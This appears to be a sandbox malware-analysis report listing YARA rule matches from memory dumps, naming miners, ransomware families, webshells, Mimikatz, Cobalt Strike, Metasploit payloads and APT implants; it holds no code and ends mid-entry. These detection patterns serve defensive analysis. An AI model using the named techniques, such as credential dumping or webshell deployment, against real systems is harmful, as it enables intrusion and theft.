Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6269974258.0000028BD77B8000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: Joe Security Rule: CVE_2018_4878_0day_ITW, Description: unknown, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: unknown Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, Author: Florian Roth Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, Author: Joe Security Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6302159310.0000028BD7C4C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Buran, Description: Yara detected Buran Ransomware, Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Gocoder_3, Description: Yara detected Gocoder ransomware, Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6347949598.0000028BD6FAA000.00000004.00000001.sdmp, Author: Joe Security Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cute, Description: Yara detected Cute Ransomware, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, Author: Joe Security Rule: Trojan_Win32_PlaKeylog_B, Description: Keylogger component, Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, Author: Microsoft Rule: DeepPanda_htran_exe, Description: Hack Deep Panda - htran-exe, Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, Author: Joe Security Rule: hacktool_macos_keylogger_logkext, Description: LogKext is an open source keylogger for Mac OS X, a product of FSB software., Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, Author: @mimeframe Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp, Author: Joe Security Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Florian Roth Rule: HackTool_Samples, Description: Hacktool, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: unknown Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Joe Security Rule: MirageStrings, Description: Mirage Identifying Strings, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Seth Hardy Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000023.00000003.6348467864.0000028BD78B0000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6432796132.0000028BD7D95000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_generic_eval, Description: Generic PHP webshell which uses any eval/exec function in the same line with user input, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: ChinaChopper_Generic, Description: China Chopper Webshells - PHP and ASPX, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_mock, Description: Yara detected Mock Ransomware, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: USG Rule: IMPLANT_5_v3, Description: XTunnel Implant by APT28, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: US CERT Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_NoCry, Description: Yara detected NoCry Ransomware, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Joe Security Rule: malware_red_leaves_memory, Description: Red Leaves C&C left in memory, use with Volatility / Rekall, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: David Cannings Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp, Author: Joe Security Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, Author: Joe Security Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_EvilGnomeRC5Key, Description: Yara detected Linux EvilGnome RC5 key, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: unknown Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6299135359.0000028BD5FE4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp, Author: Joe Security Rule: TA17_293A_malware_1, Description: inveigh pen testing tools & related artifacts, Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, Author: US-CERT Code Analysis Team (modified by Florian Roth) Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, Author: Florian Roth Rule: 